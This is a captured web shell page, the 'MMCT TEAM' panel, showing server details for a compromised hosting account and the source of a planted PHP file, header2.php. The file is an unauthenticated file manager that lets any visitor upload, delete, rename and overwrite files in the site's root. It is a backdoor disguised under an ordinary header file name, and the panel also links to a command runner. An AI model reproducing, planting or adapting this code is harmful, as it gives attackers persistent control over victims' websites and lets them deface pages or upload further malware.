MMCT TEAM
Server IP : 2a02:4780:11:767:0:2c41:85d9:6  /  Your IP : 216.73.217.91
Web Server : LiteSpeed
System : Linux in-mum-web667.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u742491609 ( 742491609)
PHP Version : 8.1.34
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u742491609/domains/apca.org.in/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u742491609/domains/apca.org.in/public_html/header2.php
<?php
// ----------------------------
// LOCKED GIBBERISH FILE MANAGER
// ----------------------------
header('Content-Type: text/html; charset=UTF-8');

// 🔒 FIXED ROOT (NO ESCAPE)
$LOCK_ROOT = realpath('/home/u742491609/domains/apca.org.in/public_html');

// resolve requested path safely
$req = isset($_GET['p']) ? realpath($_GET['p']) : $LOCK_ROOT;

// ❌ block if outside root
if ($req === false || strpos($req, $LOCK_ROOT) !== 0) {
    $req = $LOCK_ROOT;
}

$z__ = $req;

// ----------------------------
// UPLOAD
// ----------------------------
if (!empty($_FILES['xfile']['name']) && $_FILES['xfile']['error'] === UPLOAD_ERR_OK) {
    $dest = $z__ . '/' . basename($_FILES['xfile']['name']);
    if (strpos(realpath(dirname($dest)), $LOCK_ROOT) === 0) {
        @move_uploaded_file($_FILES['xfile']['tmp_name'], $dest);
    }
    header('Location: ?p=' . urlencode($z__)); exit;
}

// ----------------------------
// MKDIR
// ----------------------------
if (!empty($_POST['mk___'])) {
    $nm = basename(trim($_POST['mk___']));
    $dir = $z__ . '/' . $nm;
    if (strpos(realpath(dirname($dir)), $LOCK_ROOT) === 0) {
        @mkdir($dir);
    }
    header('Location: ?p=' . urlencode($z__)); exit;
}

// ----------------------------
// DELETE
// ----------------------------
if (!empty($_GET['d'])) {
    $vict = realpath($z__ . '/' . $_GET['d']);
    if ($vict && strpos($vict, $LOCK_ROOT) === 0) {
        is_dir($vict) ? @rmdir($vict) : @unlink($vict);
    }
    header('Location: ?p=' . urlencode($z__)); exit;
}

// ----------------------------
// RENAME
// ----------------------------
if (!empty($_POST['rfrom']) && $_POST['rto'] !== '') {
    $a = realpath($z__ . '/' . $_POST['rfrom']);
    $b = $z__ . '/' . basename($_POST['rto']);
    if ($a && strpos($a, $LOCK_ROOT) === 0 && strpos(realpath(dirname($b)), $LOCK_ROOT) === 0) {
        @rename($a, $b);
    }
    header('Location: ?p=' . urlencode($z__)); exit;
}

// ----------------------------
// SAVE FILE
// ----------------------------
if (!empty($_POST['sf']) && isset($_POST['sb'])) {
    $sf = realpath($_POST['sf']);
    if ($sf && strpos($sf, $LOCK_ROOT) === 0) {
        @file_put_contents($sf, $_POST['sb']);
    }
    header('Location: ?p=' . urlencode(dirname($sf))); exit;
}

// ----------------------------
// READ DIR
// ----------------------------
$___list = @scandir($z__);
if (!is_array($___list)) $___list = [];

// ----------------------------
// UI
// ----------------------------
echo "<div style='font-family:Verdana,monospace'>";
echo "<h2>🔐 Locked File Manager</h2>";
echo "<div style='color:#555;font-size:13px'>ROOT: {$LOCK_ROOT}</div><br>";

if ($z__ !== $LOCK_ROOT) {
    echo "<a href='?p=" . urlencode(dirname($z__)) . "'>← up</a><br><br>";
}

// upload
echo "<form method='POST' enctype='multipart/form-data' style='display:inline-block;margin-right:10px'>
<input type='file' name='xfile'>
<button>upload</button>
</form>";

// mkdir
echo "<form method='POST' style='display:inline-block'>
<input type='text' name='mk___' placeholder='new folder'>
<button>mkdir</button>
</form><br><br>";

echo "<table border='1' cellpadding='6' cellspacing='0' style='border-collapse:collapse'>";
echo "<tr><th width='320'>name</th><th>actions</th></tr>";

foreach ($___list as $n) {
    if ($n === '.' || $n === '..') continue;
    $full = $z__ . '/' . $n;

    echo "<tr><td>";
    if (is_dir($full)) {
        echo "<a href='?p=" . urlencode($full) . "'>📁 " . htmlspecialchars($n) . "</a>";
    } else {
        echo "📄 " . htmlspecialchars($n);
    }
    echo "</td><td>";

    echo "<form method='POST' style='display:inline'>
        <input type='hidden' name='rfrom' value='".htmlspecialchars($n)."'>
        <input name='rto' placeholder='rename'>
        <button>→</button>
    </form> ";

    echo "<a href='?p=".urlencode($z__)."&d=".rawurlencode($n)."' onclick='return confirm(\"delete?\")'>🗑</a> ";

    if (is_file($full)) {
        echo "<a href='?p=".urlencode($z__)."&e=".rawurlencode($n)."'>✎</a>";
    }

    echo "</td></tr>";
}
echo "</table>";

// editor
if (!empty($_GET['e'])) {
    $t = realpath($z__ . '/' . $_GET['e']);
    if ($t && strpos($t, $LOCK_ROOT) === 0 && is_file($t)) {
        echo "<h3>Edit: ".htmlspecialchars($_GET['e'])."</h3>
        <form method='POST'>
        <input type='hidden' name='sf' value='".htmlspecialchars($t)."'>
        <textarea name='sb' rows='18' cols='100'>".htmlspecialchars(file_get_contents($t))."</textarea><br>
        <button>save</button>
        </form>";
    }
}

echo "</div>";
?>

MMCT - 2023